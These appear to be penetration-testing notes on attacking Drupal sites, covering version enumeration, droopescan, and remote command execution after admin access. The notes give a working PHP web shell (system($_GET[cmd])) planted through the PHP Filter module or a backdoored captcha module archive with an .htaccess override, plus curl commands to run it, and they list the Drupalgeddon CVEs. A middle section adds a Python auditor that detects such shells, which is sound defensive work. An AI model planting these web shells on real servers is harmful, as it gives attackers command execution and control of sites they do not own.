Drupal
Introduction
Enumeration
Footprinting:
curl -s http://<url> | grep Drupal
Version Enumeration:
curl -s http://<url>/CHANGELOG.txt | grep -m2 ""
This does not work on later versions of Drupal.
Automated Scan:
droopescan:
droopescan scan drupal --url http://<url>
Attacking Drupal
Requires admin access.
PHP Filter Module:
Before version 8:
It is possible to log in as admin and enable the PHP Filter module, which allows embedded PHP code to be executed.
The module is enabled under Module. Then save the configuration.
Then we can create a new page under Content, and place our web shell code:
system($_GET[cmd]);
Then visit the php page with
?cmd=<command>
Make sure the Text format drop-down is set to PHP Code.
After version 8:
We would have to install the module ourselves by uploading the module archive.
https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz
Uploading a Backdoored Module:
Download and extract a normal module:
wget --no-check-certificate https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz
Create a PHP web shell:
<?php
system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);
?>
Create a .htaccess file:
By default, Drupal does not allow access to the /module folder.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>
Move all files into the module and create an archive:
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/
Then install this new module on Drupal.
Executing the web shell:
curl -s <url>/modules/captcha/shell.php?cmd=id
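On the defending side, the procedure above leaves two artifacts in the modules tree: a PHP file that passes request input to a command function, and an .htaccess inside a module folder. The following is an added example, not part of the original notes, that audits a modules directory on disk for both. The function names, finding labels and sample tree are constructed, and it assumes modules on the site do not normally ship their own .htaccess.

```python
import os
import re
import tempfile

# Command-execution call whose argument comes straight from request input.
EXEC_FROM_REQUEST = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*"
    r"\$_(GET|POST|REQUEST|COOKIE)\b"
)
PHP_EXTS = (".php", ".module", ".inc", ".install")  # PHP source in a module


def audit_modules(modules_dir):
    """Return sorted (relative_path, reason) findings under modules_dir."""
    findings = []
    for dirpath, _dirs, files in os.walk(modules_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, modules_dir)
            if name == ".htaccess":
                # Assumption: modules here ship no .htaccess, so review every hit.
                findings.append((rel, "htaccess-in-module"))
            elif name.endswith(PHP_EXTS):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    if EXEC_FROM_REQUEST.search(fh.read()):
                        findings.append((rel, "exec-from-request-input"))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample: one clean module, one tampered copy of captcha."""
    files = {
        "token/token.module": "<?php\nfunction token_help() { return 'ok'; }\n",
        "captcha/captcha.module": "<?php\nfunction captcha_help() {}\n",
        "captcha/shell.php": "<?php\nsystem($_GET[cmd]);\n?>\n",
        "captcha/.htaccess": "<IfModule mod_rewrite.c>\nRewriteEngine On\n</IfModule>\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        for rel, reason in audit_modules(tmp):
            print(f"{reason}: {rel}")
```

Comparing each installed module against the archive published on drupal.org catches additions that this pattern match misses, such as obfuscated PHP.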
Known Vulnerabilities:
Versions 7.0 up to 7.31 - CVE-2014-3704 (Drupalgeddon) Pre-auth SQL injection
Versions 7.58 to 8.5 - CVE-2018-7600 (Drupalgeddon2) Remote Code Execution
Multiple versions of 7.x and 8.x - CVE-2018-7602 (Drupalgeddon3) Remote Code Execution